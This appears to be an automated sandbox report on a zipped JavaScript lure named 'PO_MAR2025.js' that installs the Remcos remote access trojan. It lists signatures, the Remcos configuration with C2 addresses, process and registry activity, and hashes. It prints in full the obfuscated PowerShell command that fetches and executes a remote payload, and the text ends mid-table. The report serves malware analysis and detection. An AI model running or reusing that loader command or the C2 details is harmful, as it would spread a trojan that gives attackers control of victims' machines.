File name:

PO_MAR2025.js.zip

Full analysis: https://app.any.run/tasks/24052d34-f0b8-4cb3-bf5f-e11b4c216987
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: March 24, 2025, 08:24:13
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-scr
stegocampaign
rat
remcos
remote
Indicators:
MIME: application/zip
File info: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
MD5:

70C5AF1CB5F5CA73A9807C6DB9C1A4A5

SHA1:

855238E982E7D0CAC71E7A8A65125B54A7882811

SHA256:

220BBB464673B47E3BEF89B43AD9F3D3188FA2CA22B2B64AAB4DDAC9F8BA1B48

SSDEEP:

384:vqEAe5QdsrJ2p73T3VLdELE1QBavZpMaiEVmYvDDUMZZYg:CteOOdi73TFBEI1QBav3VmYvr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 4756)
    • STEGOCAMPAIGN has been detected

      • powershell.exe (PID: 8120)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 8120)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 8120)
    • REMCOS mutex has been found

      • MSBuild.exe (PID: 5164)
    • REMCOS has been detected

      • MSBuild.exe (PID: 5164)
      • MSBuild.exe (PID: 5164)
    • REMCOS has been detected (SURICATA)

      • MSBuild.exe (PID: 5164)
    • REMCOS has been detected (YARA)

      • MSBuild.exe (PID: 5164)
  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 8068)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 8068)
    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 8068)
    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 8068)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 8068)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 8120)
    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 8120)
    • There is functionality for taking screenshot (YARA)

      • MSBuild.exe (PID: 5164)
    • Contacting a server suspected of hosting an CnC

      • MSBuild.exe (PID: 5164)
    • Connects to unusual port

      • MSBuild.exe (PID: 5164)
    • Reads security settings of Internet Explorer

      • MSBuild.exe (PID: 5164)
  • INFO

    • Manual execution by a user

      • wscript.exe (PID: 8068)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 8120)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 8120)
    • Disables trace logs

      • powershell.exe (PID: 8120)
    • Checks proxy server information

      • powershell.exe (PID: 8120)
      • MSBuild.exe (PID: 5164)
      • slui.exe (PID: 7392)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8120)
    • Checks supported languages

      • MSBuild.exe (PID: 5164)
    • Reads the machine GUID from the registry

      • MSBuild.exe (PID: 5164)
    • Creates files or folders in the user directory

      • MSBuild.exe (PID: 5164)
    • Creates files in the program directory

      • MSBuild.exe (PID: 5164)
    • Reads the software policy settings

      • slui.exe (PID: 7292)
      • slui.exe (PID: 7392)
    • Reads the computer name

      • MSBuild.exe (PID: 5164)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Remcos

(PID) Process(5164) MSBuild.exe
C2 (2)176.65.144.200:6426
ruffella1122.duckdns.org:6426
Botnet22
Options
Connect_interval1
Install_flagFalse
Install_HKCU\RunTrue
Install_HKLM\RunTrue
Install_HKLM\Explorer\Run1
Setup_path%LOCALAPPDATA%
Copy_fileremcos.exe
Startup_valueRemcos
Hide_fileFalse
Mutex_nameRmc-ALZQZC
Keylog_flag1
Keylog_path%LOCALAPPDATA%
Keylog_filelogs.dat
Keylog_cryptFalse
Hide_keylogFalse
Screenshot_flagFalse
Screenshot_time5
Take_ScreenshotFalse
Screenshot_path%APPDATA%
Screenshot_fileScreenshots
Screenshot_cryptFalse
Mouse_optionFalse
Delete_fileFalse
Audio_record_time5
Audio_path%ProgramFiles%
Audio_dirMicRecords
Connect_delay0
Copy_dirRemcos
Keylog_dirremcos
Max_keylog_file100000
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 819
ZipBitFlag: 0x0001
ZipCompression: Unknown (99)
ZipModifyDate: 2025:03:23 16:39:48
ZipCRC: 0x00000000
ZipCompressedSize: 14767
ZipUncompressedSize: 1368781
ZipFileName: PO_MAR2025.js
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
149
Monitored processes
8
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs sppextcomobj.exe no specs slui.exe wscript.exe no specs #STEGOCAMPAIGN powershell.exe conhost.exe no specs #REMCOS msbuild.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
4756"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\PO_MAR2025.js.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
5164"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
Remcos
(PID) Process(5164) MSBuild.exe
C2 (2)176.65.144.200:6426
ruffella1122.duckdns.org:6426
Botnet22
Options
Connect_interval1
Install_flagFalse
Install_HKCU\RunTrue
Install_HKLM\RunTrue
Install_HKLM\Explorer\Run1
Setup_path%LOCALAPPDATA%
Copy_fileremcos.exe
Startup_valueRemcos
Hide_fileFalse
Mutex_nameRmc-ALZQZC
Keylog_flag1
Keylog_path%LOCALAPPDATA%
Keylog_filelogs.dat
Keylog_cryptFalse
Hide_keylogFalse
Screenshot_flagFalse
Screenshot_time5
Take_ScreenshotFalse
Screenshot_path%APPDATA%
Screenshot_fileScreenshots
Screenshot_cryptFalse
Mouse_optionFalse
Delete_fileFalse
Audio_record_time5
Audio_path%ProgramFiles%
Audio_dirMicRecords
Connect_delay0
Copy_dirRemcos
Keylog_dirremcos
Max_keylog_file100000
7260C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7292"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7392C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
8068"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\PO_MAR2025.js" C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
8120"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JninnyhammeringBzninnyhammeringGsninnyhammeringbwBkninnyhammeringGEninnyhammeringaQBjninnyhammeringCninnyhammeringninnyhammeringPQninnyhammeringgninnyhammeringCcninnyhammeringMninnyhammeringninnyhammeringvninnyhammeringHYninnyhammeringVQBZninnyhammeringGsninnyhammeringSninnyhammeringBEninnyhammeringEQninnyhammeringVninnyhammeringninnyhammeringvninnyhammeringGQninnyhammeringLwBlninnyhammeringGUninnyhammeringLgBlninnyhammeringCMninnyhammeringcwBhninnyhammeringHninnyhammeringninnyhammeringLwninnyhammeringvninnyhammeringDoninnyhammeringcwBwninnyhammeringCMninnyhammeringIwBoninnyhammeringCcninnyhammeringOwninnyhammeringkninnyhammeringGUninnyhammeringcgBpninnyhammeringG8ninnyhammeringbQBlninnyhammeringHQninnyhammeringZQByninnyhammeringCninnyhammeringninnyhammeringPQninnyhammeringgninnyhammeringCQninnyhammeringcwBrninnyhammeringG8ninnyhammeringZninnyhammeringBhninnyhammeringGkninnyhammeringYwninnyhammeringgninnyhammeringC0ninnyhammeringcgBlninnyhammeringHninnyhammeringninnyhammeringbninnyhammeringBhninnyhammeringGMninnyhammeringZQninnyhammeringgninnyhammeringCcninnyhammeringIwninnyhammeringnninnyhammeringCwninnyhammeringIninnyhammeringninnyhammeringnninnyhammeringHQninnyhammeringJwninnyhammering7ninnyhammeringCQninnyhammeringaninnyhammeringBvninnyhammeringG0ninnyhammeringbwBwninnyhammeringHIninnyhammeringbwByninnyhammeringGEninnyhammeringbninnyhammeringninnyhammeringgninnyhammeringD0ninnyhammeringIninnyhammeringninnyhammeringnninnyhammeringGgninnyhammeringdninnyhammeringB0ninnyhammeringHninnyhammeringninnyhammeringcwninnyhammering6ninnyhammeringC8ninnyhammeringLwBpninnyhammeringGEninnyhammeringNgninnyhammeringwninnyhammeringDninnyhammeringninnyhammeringMgninnyhammeringwninnyhammeringDQninnyhammeringLgB1ninnyhammeringHMninnyhammeringLgBhninnyhammeringHIninnyhammeringYwBoninnyhammeringGkninnyhammeringdgBlninnyhammeringC4ninnyhammeringbwByninnyhammeringGcninnyhammeringLwninnyhammeringyninnyhammeringDUninnyhammeringLwBpninnyhammeringHQninnyhammeringZQBtninnyhammeringHMninnyhammeringLwBuninnyhammeringGUninnyhammeringdwBfninnyhammeringGkninnyhammeringbQBhninnyhammeringGcninnyhammeringZQBfninnyhammeringDIninnyhammeringMninnyhammeringninnyhammeringyninnyhammeringDUninnyhammeringMninnyhammeringninnyhammeringzninnyhammeringDEninnyhammeringOninnyhammeringninnyhammeringvninnyhammeringG4ninnyhammeringZQB3ninnyhammeringF8ninnyhammeringaQBtninnyhammeringGEninnyhammeringZwBlninnyhammeringC4ninnyhammeringagBwninnyhammeringGcninnyhammeringJwninnyhammering7ninnyhammeringCQninnyhammeringYwBsninnyhammeringGUninnyhammeringbQBtninnyhammeringHkninnyhammeringaQBkninnyhammeringCninnyhammeringninnyhammeringPQninnyhammeringgninnyhammeringE4ninnyhammeringZQB3ninnyhammeringC0ninnyhammeringTwBininnyhammeringGoninnyhammeringZQBjninnyhammeringHQninnyhammeringIninnyhammeringBTninnyhammeringHkninnyhammeringcwB0ninnyhammeringGUninnyhammeringbQninnyhammeringuninnyhammeringE4ninnyhammeringZQB0ninnyhammeringC4ninnyhammeringVwBlninnyhammeringGIninnyhammeringQwBsninnyhammeringGkninnyhammeringZQBuninnyhammeringHQninnyhammeringOwninnyhammeringkninnyhammeringGcninnyhammeringbwBuninnyhammeringGEninnyhammeringZninnyhammeringBhninnyhammeringGwninnyhammeringIninnyhammeringninnyhammering9ninnyhammeringCninnyhammeringninnyhammeringJninnyhammeringBjninnyhammeringGwninnyhammeringZQBtninnyhammeringG0ninnyhammeringeQBpninnyhammeringGQninnyhammeringLgBEninnyhammeringG8ninnyhammeringdwBuninnyhammeringGwninnyhammeringbwBhninnyhammeringGQninnyhammeringRninnyhammeringBhninnyhammeringHQninnyhammeringYQninnyhammeringoninnyhammeringCQninnyhammeringaninnyhammeringBvninnyhammeringG0ninnyhammeringbwBwninnyhammeringHIninnyhammeringbwByninnyhammeringGEninnyhammeringbninnyhammeringninnyhammeringpninnyhammeringDsninnyhammeringJninnyhammeringBsninnyhammeringG8ninnyhammeringdgBpninnyhammeringHIninnyhammeringaQBkninnyhammeringGUninnyhammeringIninnyhammeringninnyhammering9ninnyhammeringCninnyhammeringninnyhammeringWwBTninnyhammeringHkninnyhammeringcwB0ninnyhammeringGUninnyhammeringbQninnyhammeringuninnyhammeringFQninnyhammeringZQB4ninnyhammeringHQninnyhammeringLgBFninnyhammeringG4ninnyhammeringYwBvninnyhammeringGQninnyhammeringaQBuninnyhammeringGcninnyhammeringXQninnyhammering6ninnyhammeringDoninnyhammeringVQBUninnyhammeringEYninnyhammeringOninnyhammeringninnyhammeringuninnyhammeringEcninnyhammeringZQB0ninnyhammeringFMninnyhammeringdninnyhammeringByninnyhammeringGkninnyhammeringbgBnninnyhammeringCgninnyhammeringJninnyhammeringBnninnyhammeringG8ninnyhammeringbgBhninnyhammeringGQninnyhammeringYQBsninnyhammeringCkninnyhammeringOwninnyhammeringkninnyhammeringHQninnyhammeringdQB0ninnyhammeringG8ninnyhammeringcgBsninnyhammeringHkninnyhammeringIninnyhammeringninnyhammering9ninnyhammeringCninnyhammeringninnyhammeringJwninnyhammering8ninnyhammeringDwninnyhammeringQgBBninnyhammeringFMninnyhammeringRQninnyhammering2ninnyhammeringDQninnyhammeringXwBTninnyhammeringFQninnyhammeringQQBSninnyhammeringFQninnyhammeringPgninnyhammering+ninnyhammeringCcninnyhammeringOwninnyhammeringkninnyhammeringHninnyhammeringninnyhammeringYQBnninnyhammeringG8ninnyhammeringZninnyhammeringninnyhammeringgninnyhammeringD0ninnyhammeringIninnyhammeringninnyhammeringnninnyhammeringDwninnyhammeringPninnyhammeringBCninnyhammeringEEninnyhammeringUwBFninnyhammeringDYninnyhammeringNninnyhammeringBfninnyhammeringEUninnyhammeringTgBEninnyhammeringD4ninnyhammeringPgninnyhammeringnninnyhammeringDsninnyhammeringJninnyhammeringBzninnyhammeringGgninnyhammeringaQBwninnyhammeringHninnyhammeringninnyhammeringZQBuninnyhammeringCninnyhammeringninnyhammeringPQninnyhammeringgninnyhammeringCQninnyhammeringbninnyhammeringBvninnyhammeringHYninnyhammeringaQByninnyhammeringGkninnyhammeringZninnyhammeringBlninnyhammeringC4ninnyhammeringSQBuninnyhammeringGQninnyhammeringZQB4ninnyhammeringE8ninnyhammeringZgninnyhammeringoninnyhammeringCQninnyhammeringdninnyhammeringB1ninnyhammeringHQninnyhammeringbwByninnyhammeringGwninnyhammeringeQninnyhammeringpninnyhammeringDsninnyhammeringJninnyhammeringBpninnyhammeringHQninnyhammeringZQBtninnyhammeringGkninnyhammeringcwBlninnyhammeringCninnyhammeringninnyhammeringPQninnyhammeringgninnyhammeringCQninnyhammeringbninnyhammeringBvninnyhammeringHYninnyhammeringaQByninnyhammeringGkninnyhammeringZninnyhammeringBlninnyhammeringC4ninnyhammeringSQBuninnyhammeringGQninnyhammeringZQB4ninnyhammeringE8ninnyhammeringZgninnyhammeringoninnyhammeringCQninnyhammeringcninnyhammeringBhninnyhammeringGcninnyhammeringbwBkninnyhammeringCkninnyhammeringOwninnyhammeringkninnyhammeringHMninnyhammeringaninnyhammeringBpninnyhammeringHninnyhammeringninnyhammeringcninnyhammeringBlninnyhammeringG4ninnyhammeringIninnyhammeringninnyhammeringtninnyhammeringGcninnyhammeringZQninnyhammeringgninnyhammeringDninnyhammeringninnyhammeringIninnyhammeringninnyhammeringtninnyhammeringGEninnyhammeringbgBkninnyhammeringCninnyhammeringninnyhammeringJninnyhammeringBpninnyhammeringHQninnyhammeringZQBtninnyhammeringGkninnyhammeringcwBlninnyhammeringCninnyhammeringninnyhammeringLQBnninnyhammeringHQninnyhammeringIninnyhammeringninnyhammeringkninnyhammeringHMninnyhammeringaninnyhammeringBpninnyhammeringHninnyhammeringninnyhammeringcninnyhammeringBlninnyhammeringG4ninnyhammeringOwninnyhammeringkninnyhammeringHMninnyhammeringaninnyhammeringBpninnyhammeringHninnyhammeringninnyhammeringcninnyhammeringBlninnyhammeringG4ninnyhammeringIninnyhammeringninnyhammeringrninnyhammeringD0ninnyhammeringIninnyhammeringninnyhammeringkninnyhammeringHQninnyhammeringdQB0ninnyhammeringG8ninnyhammeringcgBsninnyhammeringHkninnyhammeringLgBMninnyhammeringGUninnyhammeringbgBnninnyhammeringHQninnyhammeringaninnyhammeringninnyhammering7ninnyhammeringCQninnyhammeringawB1ninnyhammeringGsninnyhammeringdQBpninnyhammeringCninnyhammeringninnyhammeringPQninnyhammeringgninnyhammeringCQninnyhammeringaQB0ninnyhammeringGUninnyhammeringbQBpninnyhammeringHMninnyhammeringZQninnyhammeringgninnyhammeringC0ninnyhammeringIninnyhammeringninnyhammeringkninnyhammeringHMninnyhammeringaninnyhammeringBpninnyhammeringHninnyhammeringninnyhammeringcninnyhammeringBlninnyhammeringG4ninnyhammeringOwninnyhammeringkninnyhammeringGEninnyhammeringcwBzninnyhammeringG8ninnyhammeringYwBpninnyhammeringGEninnyhammeringdninnyhammeringBlninnyhammeringHMninnyhammeringIninnyhammeringninnyhammering9ninnyhammeringCninnyhammeringninnyhammeringJninnyhammeringBsninnyhammeringG8ninnyhammeringdgBpninnyhammeringHIninnyhammeringaQBkninnyhammeringGUninnyhammeringLgBTninnyhammeringHUninnyhammeringYgBzninnyhammeringHQninnyhammeringcgBpninnyhammeringG4ninnyhammeringZwninnyhammeringoninnyhammeringCQninnyhammeringcwBoninnyhammeringGkninnyhammeringcninnyhammeringBwninnyhammeringGUninnyhammeringbgninnyhammeringsninnyhammeringCninnyhammeringninnyhammeringJninnyhammeringBrninnyhammeringHUninnyhammeringawB1ninnyhammeringGkninnyhammeringKQninnyhammering7ninnyhammeringCQninnyhammeringcwBjninnyhammeringGEninnyhammeringdninnyhammeringBvninnyhammeringHninnyhammeringninnyhammeringaninnyhammeringBhninnyhammeringGcninnyhammeringaQBjninnyhammeringCninnyhammeringninnyhammeringPQninnyhammeringgninnyhammeringFsninnyhammeringUwB5ninnyhammeringHMninnyhammeringdninnyhammeringBlninnyhammeringG0ninnyhammeringLgBDninnyhammeringG8ninnyhammeringbgB2ninnyhammeringGUninnyhammeringcgB0ninnyhammeringF0ninnyhammeringOgninnyhammering6ninnyhammeringEYninnyhammeringcgBvninnyhammeringG0ninnyhammeringQgBhninnyhammeringHMninnyhammeringZQninnyhammering2ninnyhammeringDQninnyhammeringUwB0ninnyhammeringHIninnyhammeringaQBuninnyhammeringGcninnyhammeringKninnyhammeringninnyhammeringkninnyhammeringGEninnyhammeringcwBzninnyhammeringG8ninnyhammeringYwBpninnyhammeringGEninnyhammeringdninnyhammeringBlninnyhammeringHMninnyhammeringKQninnyhammering7ninnyhammeringCQninnyhammeringZninnyhammeringBvninnyhammeringHYninnyhammeringZQBpninnyhammeringHMninnyhammeringaninnyhammeringninnyhammeringgninnyhammeringD0ninnyhammeringIninnyhammeringBbninnyhammeringFMninnyhammeringeQBzninnyhammeringHQninnyhammeringZQBtninnyhammeringC4ninnyhammeringUgBlninnyhammeringGYninnyhammeringbninnyhammeringBlninnyhammeringGMninnyhammeringdninnyhammeringBpninnyhammeringG8ninnyhammeringbgninnyhammeringuninnyhammeringEEninnyhammeringcwBzninnyhammeringGUninnyhammeringbQBininnyhammeringGwninnyhammeringeQBdninnyhammeringDoninnyhammeringOgBMninnyhammeringG8ninnyhammeringYQBkninnyhammeringCgninnyhammeringJninnyhammeringBzninnyhammeringGMninnyhammeringYQB0ninnyhammeringG8ninnyhammeringcninnyhammeringBoninnyhammeringGEninnyhammeringZwBpninnyhammeringGMninnyhammeringKQninnyhammering7ninnyhammeringCQninnyhammeringYQBtninnyhammeringGIninnyhammeringaQB0ninnyhammeringGEninnyhammeringbninnyhammeringninnyhammeringgninnyhammeringD0ninnyhammeringIninnyhammeringBbninnyhammeringGQninnyhammeringbgBsninnyhammeringGkninnyhammeringYgninnyhammeringuninnyhammeringEkninnyhammeringTwninnyhammeringuninnyhammeringEgninnyhammeringbwBtninnyhammeringGUninnyhammeringXQninnyhammeringuninnyhammeringEcninnyhammeringZQB0ninnyhammeringE0ninnyhammeringZQB0ninnyhammeringGgninnyhammeringbwBkninnyhammeringCgninnyhammeringJwBWninnyhammeringEEninnyhammeringSQninnyhammeringnninnyhammeringCkninnyhammeringLgBJninnyhammeringG4ninnyhammeringdgBvninnyhammeringGsninnyhammeringZQninnyhammeringoninnyhammeringCQninnyhammeringbgB1ninnyhammeringGwninnyhammeringbninnyhammeringninnyhammeringsninnyhammeringCninnyhammeringninnyhammeringWwBvninnyhammeringGIninnyhammeringagBlninnyhammeringGMninnyhammeringdninnyhammeringBbninnyhammeringF0ninnyhammeringXQninnyhammeringgninnyhammeringEninnyhammeringninnyhammeringKninnyhammeringninnyhammeringkninnyhammeringGUninnyhammeringcgBpninnyhammeringG8ninnyhammeringbQBlninnyhammeringHQninnyhammeringZQByninnyhammeringCwninnyhammeringJwninnyhammeringnninnyhammeringCwninnyhammeringJwninnyhammeringnninnyhammeringCwninnyhammeringJwninnyhammeringnninnyhammeringCwninnyhammeringJwBNninnyhammeringFMninnyhammeringQgB1ninnyhammeringGkninnyhammeringbninnyhammeringBkninnyhammeringCcninnyhammeringLninnyhammeringninnyhammeringnninnyhammeringCcninnyhammeringLninnyhammeringninnyhammeringnninnyhammeringCcninnyhammeringLninnyhammeringninnyhammeringnninnyhammeringCcninnyhammeringLninnyhammeringninnyhammeringnninnyhammeringCcninnyhammeringLninnyhammeringninnyhammeringnninnyhammeringCcninnyhammeringLninnyhammeringninnyhammeringnninnyhammeringCcninnyhammeringLninnyhammeringninnyhammeringnninnyhammeringCcninnyhammeringLninnyhammeringninnyhammeringnninnyhammeringCcninnyhammeringLninnyhammeringninnyhammeringnninnyhammeringCcninnyhammeringLninnyhammeringninnyhammeringnninnyhammeringCcninnyhammeringLninnyhammeringninnyhammeringnninnyhammeringDIninnyhammeringJwninnyhammeringpninnyhammeringCkninnyhammering'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('ninnyhammering','A'))); Invoke-Expression $OWjuxd""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
8128\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
8 310
Read events
8 285
Write events
25
Delete events
0

Modification events

(PID) Process:(4756) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(4756) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(4756) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(4756) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\PO_MAR2025.js.zip
(PID) Process:(4756) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(4756) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(4756) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(4756) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(4756) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
0
(PID) Process:(4756) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF3D0000002D000000FD03000016020000
Executable files
0
Suspicious files
3
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
8120powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ugtszpbe.b3z.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8120powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lbnaowj5.2pg.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4756WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb4756.47659\PO_MAR2025.jstext
MD5:50367529E00C8030113DE9C62A8C5644
SHA256:22DCB7A319487133E7DD89094F83D7F62CC9E41E4D1324F6C34370E902F05771
5164MSBuild.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\json[1].jsonbinary
MD5:DA17E416BC8C2333DB01D21A9313ECB5
SHA256:72D29C7D14ADB6E395FFDB00FE14BBE26007AA96ED9DA29C74A4EF28F1AD55DD
8120powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:A2A42FA131D18609A112A7505B1D43B3
SHA256:15723E1E3D64C174FFFDB487ED46657B0ACE8BEFB317514283E4D936917D421C
5164MSBuild.exeC:\ProgramData\remcos\logs.datbinary
MD5:DF5B5B7105E858F91366AE0A64D4FCBE
SHA256:37A692995AAC2A84C8619B2499578AF45017D9A011BF2077C02BD5B756FF91E8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
26
DNS requests
19
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2104
svchost.exe
GET
200
23.48.23.156:80
